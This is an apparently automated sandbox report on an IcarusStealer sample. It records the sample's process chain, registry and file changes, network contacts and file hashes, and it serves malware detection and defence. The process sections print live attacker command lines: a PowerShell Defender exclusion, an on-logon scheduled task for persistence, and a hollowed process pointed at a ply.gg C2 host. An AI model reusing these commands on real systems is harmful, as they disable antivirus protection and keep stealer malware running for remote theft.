Malware Analysis Report

2024-08-06 08:22

Sample ID 240314-v6f3xsac6t
Target custom1.exe
SHA256 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Tags: icarusstealer persistence stealer
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Threat Level: Known bad

The file custom1.exe was found to be: Known bad.

Malicious Activity Summary

icarusstealer persistence stealer

IcarusStealer

Modifies Installed Components in the registry

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported: 2024-03-14 17:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-03-14 17:35
Reported: 2024-03-14 17:38
Platform: win7-20240221-en
Max time kernel: 149s
Max time network: 149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\custom1.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File created C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2624 set thread context of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2084 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2996 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2996 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2640 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2760 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2760 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2624 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2480 wrote to memory of 2916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 108 wrote to memory of 2768 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2472 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 1032 wrote to memory of 1500 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\custom1.exe

"C:\Users\Admin\AppData\Local\Temp\custom1.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\AppData\Local\Temp\switched.exe

"C:\Users\Admin\AppData\Local\Temp\switched.exe"

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE43.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD620E4CA7FE54156A29ED1C9529AF5DF.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2156.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 keyauth.win udp
US 104.26.1.5:443 keyauth.win tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:49220 tcp
N/A 127.0.0.1:49222 tcp
N/A 127.0.0.1:49282 tcp
N/A 127.0.0.1:49284 tcp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp

Files

\Users\Admin\AppData\Local\Temp\Client.exe

MD5 41bb20a321d77b2bdf96ba74783feca8
SHA1 61eac12659e5141463acdc36b3b42bb12e32a18c
SHA256 80b30d39834f87a48c64f252a706d4a107ee3b83df3d5bc440fe303af4ffd529
SHA512 b3ae8cfda4b66e18202645aad37204f742c20ff2fb89cd84b8ad7cd6c728f4cc2d621d77d34b6acc556f27bd9c969aef979a0e37e9be70c1d4b62da73dad5923

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 9da00b6427a91d73de0f7b20df26b849
SHA1 724a547b8e4edc340c2ae53a15f3ed156d44287f
SHA256 ea298f0bdc32ef49b4ebe551276ff229079bc78b216bd8df8879dfdb8b01edcd
SHA512 10532d4e04ffbeaf6767398208df5f7b75470590e2eb35a551b3c6cf06c24d67bd382e59f929be7cf8d1c5e94089d4979b9bff8b833b2bb6a2a7bb73f9afdb7b

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 2f3e6e8955ea526e9dda7ab10414840f
SHA1 0027f0db042ecb3d6c59e4b7ff2a605cda38ffb5
SHA256 25f1407aa290e3a2a90eec56dc6c531fb13a7e43bd9a33016c7f677a6447923b
SHA512 98a4c6dc610c891be99889595e098f05d8f79c8fc0f1691d0a2a35efd4656f13b3a78f73576ac3e1e20676ceefcb6216dd3cbde934eeef7fee23d591a1b74173

memory/2700-9-0x0000000000B40000-0x0000000001180000-memory.dmp

memory/2700-10-0x0000000074590000-0x0000000074C7E000-memory.dmp

\Users\Admin\AppData\Local\Temp\switched.exe

MD5 b9bbe31d276de5c3d05352d070ae4244
SHA1 5e1bb67b01c579b4e0ad5a7475ceb657201c27ec
SHA256 a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
SHA512 0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 ceb8c3c0f2249f05f3df8f88d46ae743
SHA1 651675ba157c085ce64aa5bb2abbfd6f5efc75c6
SHA256 a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778
SHA512 872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a

memory/2996-22-0x0000000003340000-0x000000000377C000-memory.dmp

memory/2640-23-0x000000013FE10000-0x000000014024C000-memory.dmp

\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 0f0838bc6642dd6bc603368e50b4aba3
SHA1 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA256 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512 a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

memory/2624-29-0x0000000000BF0000-0x0000000000C72000-memory.dmp

memory/2624-31-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/2624-32-0x0000000004B40000-0x0000000004B80000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.cmdline

MD5 80a1cd1a299b50a00281726b2a5f1295
SHA1 b19f6469acfd5f7c09ed93cf0e653e1b6f0c6428
SHA256 30b41329ac56ec4c179b8c2101a6c2b0db0a3b00843afcd54670aab4de64674c
SHA512 c7b4b5fc819fe3962762631f2675db7cf0b78994b6e29ce706eade107f21e834f5a4c5abc4c5e197b4bd42f0171b679fb02f5d22df874bf0422f82d0a4f4f510

\??\c:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

C:\Users\Admin\AppData\Local\Temp\RESE43.tmp

MD5 c1187374035c9c044ef03a6cac62d2e8
SHA1 b5ad05e6966e248207af70f51fa076b3f19ce4e2
SHA256 1e112fe7d3103f685b5b059b05e688289a0acc3d50473eb91dd3fe567ad45ca0
SHA512 105463bd65b3c274c1d38583b1d9c68fb87e02ee575190346fb71f278f1dfc241fc6e880291f6cf66a520951e4c10ec408071a0437bb8f03c31ddf72eb5c7f2d

memory/1032-47-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1032-45-0x0000000000400000-0x0000000000424000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCD620E4CA7FE54156A29ED1C9529AF5DF.TMP

MD5 1d5543c367c49b9dd6366270fdd4ee3a
SHA1 bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66
SHA256 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2
SHA512 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

memory/1032-49-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

MD5 5c13f91965d83fb112657fce83f48802
SHA1 0cbde19c106427cc4edd6a2423cd79b30764632d
SHA256 d61ad762cbe5d931208412f2e825c486b0e7cf7b0e5278f0ad86fc60dc6d1477
SHA512 ba2773a39fb0b54847c745fc425f80feccad5af0e0fadcda2c7f9eb327756434356ef86c38b067de837fc7e3da785101cc3f7caad5c107820b3eea75bb4637c1

memory/1032-50-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1032-56-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1032-51-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1032-60-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1032-58-0x0000000000400000-0x0000000000424000-memory.dmp

memory/804-61-0x0000000001180000-0x0000000001188000-memory.dmp

memory/1032-63-0x0000000004A60000-0x0000000004AA0000-memory.dmp

memory/1032-64-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/804-62-0x000007FEF56F0000-0x000007FEF60DC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\63QG9ZJUK59TQIGBF1C6.temp

MD5 e5cd928526289a221212a39a5a8abb24
SHA1 5bd1e28c75e0e5f66eada1cd9fa5da7382dbc2cb
SHA256 4196635fd53050d3229f1299a3034b015b4274c474b953bd7b9de31f7ba9bfa0
SHA512 ac46fe719e601468ff0a5527ad071a92f8c03669513d9e5d2ecef9a143768fee1e92652d64c9c2fc9a008c04877f71a619616eb946a3fe04c48b1d380bab9885

memory/1256-72-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/616-73-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/616-74-0x0000000002B10000-0x0000000002B50000-memory.dmp

memory/1256-75-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/616-76-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/1256-77-0x0000000002D80000-0x0000000002DC0000-memory.dmp

memory/616-78-0x0000000002B10000-0x0000000002B50000-memory.dmp

memory/1256-79-0x0000000002D80000-0x0000000002DC0000-memory.dmp

memory/616-80-0x0000000002B10000-0x0000000002B50000-memory.dmp

memory/2700-81-0x00000000009A0000-0x00000000009E0000-memory.dmp

memory/804-82-0x000000001AE50000-0x000000001AED0000-memory.dmp

memory/1256-83-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/616-84-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/2624-85-0x0000000074590000-0x0000000074C7E000-memory.dmp

C:\Windows\System32\catroot\$SXR\$SXR.exe

MD5 4bd5a0408b3ce5efe4d2aad0c141154d
SHA1 64cfb6af044f175ec76176d284e66f24c4063e6c
SHA256 663b90b0a72843dddc51e070fcb7b2ab26f56cc2e86ef9b832604a271dff411a
SHA512 6ab297fd299023c80a7568b8bd74230022c024b6ebdd0e2abf84d036c6f967c6027e5646962475cfb9e8ff5306cb83e0c892ad39816be00f839b398a9415dbb0

C:\Users\Admin\AppData\Local\Temp\tmp2156.tmp.bat

MD5 01965b3e40047eadca92b1344a4d1ba8
SHA1 dab8c443348f3f9e8df0994ed38a8e9ba74690c0
SHA256 33b88d16bba3c6acc31d0c70fcf08e5721039c64e49b68178b9bfed48d9ced96
SHA512 bd2cb6a7ca2af430df74d5deb9f6aa193b68f747a6c029e1549d79cc9b5637bea6463027f950604de3aefba52ebd8763611723be9cde5cf671e261716057355e

memory/2700-96-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/108-98-0x0000000003E90000-0x0000000003E91000-memory.dmp

\Windows\System32\catroot\$SXR\$SXR.exe

MD5 95ca16db3c6ffe18f678246226235a32
SHA1 d358bdaa55d5878fa90d8272ec3676116e85018a
SHA256 dbcb6bff7d4bab19d17321cf41e8359ea6e2ef13498bf6c98bc72f7614ff22ad
SHA512 e41a6ea1e007423586ef194c80b07fc6d4c0b113a3d6740ba6e1b9dcbf18ae9784dc899e153d7a6f9c74251624a713fb63fd1cb70f3a64594bd00b90e74a0bca

C:\Windows\System32\catroot\$SXR\$SXR.exe

MD5 30111650408e0c92181d4fd8aedf75bf
SHA1 c372699a0023f2320fbabc9f0fc10c4d88213b50
SHA256 eb8fb3cce486be08859bb996b81bdeb037602601400dcfcc28fe69db5c4af8f4
SHA512 0d9f8e68c7ddc97941fd5fd4951d439cbfd0cf434b3814ac0ee8aff3a066da617320a6c96e41478c50d4ce96fa3d7c44af40e98e89982d3f2672eb6c996cd5b3

memory/604-103-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/604-102-0x0000000001090000-0x00000000016D0000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 899b39e1c1dc74440135ff584160cced
SHA1 673bd63287f722db94f64e77b72661cf38a35353
SHA256 3bdc087d9c937d6c51baf06d01b4107a0a62cd94a53c3ac7a43bbcedfb776403
SHA512 71c070262b0433890c0553ab7613418af37ac3390e5771372852dacfc5ec6b7de8880e7b76e24a5e517711cb9ae01123800a6171ce9fe36eda00452119510a3e

memory/2640-104-0x000000013FE10000-0x000000014024C000-memory.dmp

memory/604-105-0x0000000000630000-0x0000000000670000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\Read.txt

MD5 79668a6729f0f219835c62c9e43b7927
SHA1 0cbbc7cc8dbd27923b18285960640f3dad96d146
SHA256 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512 bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

memory/804-108-0x000007FEF56F0000-0x000007FEF60DC000-memory.dmp

memory/1032-109-0x0000000004A60000-0x0000000004AA0000-memory.dmp

memory/1032-110-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/804-111-0x000000001AE50000-0x000000001AED0000-memory.dmp

memory/108-112-0x0000000003E90000-0x0000000003E91000-memory.dmp

memory/604-113-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/604-114-0x0000000000630000-0x0000000000670000-memory.dmp

memory/108-119-0x0000000002A00000-0x0000000002A10000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-14 17:35

Reported

2024-03-14 17:43

Platform

win10v2004-20231215-en

Max time kernel

450s

Max time network

450s

Command Line

"C:\Users\Admin\AppData\Local\Temp\custom1.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\custom1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File created C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 992 set thread context of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
